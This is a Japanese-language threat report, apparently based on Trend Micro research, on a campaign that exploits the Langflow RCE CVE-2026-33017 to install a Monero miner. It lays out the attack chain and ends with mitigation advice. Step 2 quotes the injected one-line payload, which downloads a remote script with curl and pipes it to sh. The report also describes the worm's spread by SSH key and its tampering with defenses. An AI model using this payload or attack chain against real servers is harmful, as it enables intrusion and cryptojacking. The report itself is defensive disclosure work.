LangflowのRCE脆弱性を悪用した攻撃、インターネット公開AIサーバへMonero暗号通貨マイナーを展開

脅威アクターがCVE-2026-33017を積極的に悪用しています。これはLangflowに存在する認証不要のリモートコード実行（RCE）の重大な脆弱性であり、インターネットに公開されたAIアプリケーションサーバーを侵害し、カスタマイズされたMonero（XMR）暗号通貨マイナーをひそかに展開する手口が確認されています。

Trend MicroのリサーチャーであるSimon DuludeとJohn Zhangが追跡・記録したこのキャンペーンは、コモディティ型暗号通貨マイナーの配布戦術における大きな転換点を示しています。従来のDocker API悪用やSSHブルートフォースから、AIワークフローインフラを標的とする手口へとシフトしています。

脆弱性の概要

CVE-2026-33017は、LangflowのPOST /api/v1/build_public_tmp/{flow_id}/flow エンドポイントに存在します。このエンドポイントは、ログインせずに公開AIフローを実行することを認証不要のユーザーに許可するものです。

致命的な欠陥は、リクエストにオプションのdataパラメーターが含まれる場合、エンドポイントが攻撃者の制御するPythonコードを受け入れ、サンドボックスなしで直接exec()に渡してしまう点にあります。

さらにリスクを高めているのは、LangflowがデフォルトでAUTO_LOGINを有効にした状態で出荷されている点です。これにより、認証されていない任意の訪問者がスーパーユーザートークンを取得し、パブリックフローを自由に作成できます。実質的に、インターネットにアクセスできる誰もがサーバー側でのコード実行を完全に行えてしまう状態になっています。

この脆弱性のCVSSベーススコアは9.8（Critical）であり、CISAの既知の悪用脆弱性（KEV）カタログにも追加されています。バージョン1.8.2以下のすべてのLangflowが影響を受けます。修正パッチはバージョン1.9.0.research.jfrog+5で提供されています。

攻撃チェーン：ステップ・バイ・ステップ

ステップ1 – 偵察。脅威アクターはまず、5秒間に10件のHTTPリクエストを送信する高速フィンガープリントスキャンを実行します。Safari、Firefox、Chromeの各バリエーションをローテーションしたなりすましUser-Agent文字列を使用し、/health、/api/v1/version、/manifest.json などのエンドポイントを探索しながら、シグネチャベースの検出を意図的に回避しています。

ステップ2 – CVE-2026-33017による初期アクセス。ターゲットを確認した後、攻撃者はpython-requests/2.25.1という固定User-Agentを使用して悪意あるPOSTリクエストを送信します。注入されるPythonペイロードは __import__(‘os’).system(‘curl hxxp[://]83[.]142[.]209[.]214:8080/isp.sh | sh’) の1行のみです。ハードコードされたフローUUID（0ee284cc-0eb1-493f-bc60-94fa8d1cfd18）は、すべてのエクスプロイト試行で共通して使用されています。

ステップ3 – ドロッパー段階（isp.sh）。取得されたBashドロッパーは既存の感染がないか確認した後、/var/tmp/.xlamb/ に隠し永続ディレクトリを作成します。次に、メインマルウェアバイナリ「lambsys」をcurlまたはwgetでダウンロードし、nohupでバックグラウンドに起動します。その後すぐに、SSHキー再利用型ワームが起動し、~/.ssh/known_hosts、id_rsa、id_ed25519、ロードされたSSHエージェントソケットを列挙して、到達可能なすべてのホストへ横方向に拡散します。

ステップ4 – lambsys.elfの実行。このUPXパック済みのGoバイナリ（約296 KB）は、キャンペーンの中核を担うマルウェアです。実行されると、まずファイルディスクリプタの上限を65,535に引き上げ、その後Kinsing、WatchDog、Rocke、Outlawなど39個の競合する暗号通貨マイナープロセスを名前で体系的に終了させ、既知のマイニングポート13個で動作するプロセスも終了させます。さらに、以前のマイナーキャンペーンが残したバックドアアカウント「akay」と「vfinder」も削除します。

ステップ5 – 防御回避。lambsysはAppArmor、SELinux、UFW、iptables、Linux NMIウォッチドッグ、そしてAlibaba CloudのAliyunセキュリティエージェントを無効化します。DebianファミリーおよびRHELファミリーのホストの両方を対象としています。cron、/tmp、SSHディレクトリからchattr +iによる変更不可ロックを解除し、侵害の痕跡を消去するために/var/log/syslogを削除します。

ステップ6 – 永続化。2つのウォッチドッグ機構が展開されます。5分ごとに実行されるcronジョブと、60秒ごとに実行されるBashループ（init_rmount）です。いずれも、プロセスが消えている場合にC2からlambsysを再ダウンロードします。展開後、/var/tmpと/tmpはchattr +iuaでロックされ、rootでさえ永続化アーティファクトを削除できない状態にされます。

ステップ7 – Moneroマイニング。lambsysはC2からks.tarをダウンロードし、MD5で検証（ハッシュ: 46096a72d84db5f1dafd944fcf6571c8）した後、procqという名称のカスタマイズXMRigビルドを、トリプルドットスペースの隠しディレクトリ（./. /. /procq）に展開します。マイナーはSystemMonitor/6.25.0というなりすましUser-Agentを使用してTCP/3333経由でプールに接続し、固有のXMRウォレットに対してマイニングを行います。C2へのハートビートビーコンは、HTTPポート80経由で約128秒ごとに/status.phpへPOSTされます。

侵害の痕跡（IoC）

ファイルハッシュ（SHA-256）

ネットワーク指標

注記：IPアドレスとドメインは、誤った名前解決やハイパーリンク化を防ぐため、意図的に無害化（デファング）されています（例: [.]）。再活性化（リファング）は、MISP、VirusTotal、またはSIEMなどの管理された脅威インテリジェンスプラットフォーム上でのみ行ってください。

緩和策と推奨事項

Langflowを運用している組織は、バージョン1.8.2を含むそれ以前のすべてのバージョンが悪用可能な状態にあるため、直ちにバージョン1.9.0以降にアップグレードしてください。また、Langflowインスタンスへのパブリックインターネットアクセスを制限し、サービスが特権アカウントで実行されないようにしてください。

防御担当者は、エグレスファイアウォールでSpamhaus DROPフィードを適用することを推奨します。これにより、Langflow固有のルールを一切設けることなく、このキャンペーンが発するすべてのC2ビーコンをブロックできます。

Lambsysのアーティファクトが発見された場合は、単一ホストの侵害としてではなく、SSHキーの漏洩インシデントとして対応してください。このワームは被害者のSSH到達可能なインフラ全体に横断的に侵入する能力を持っているためです。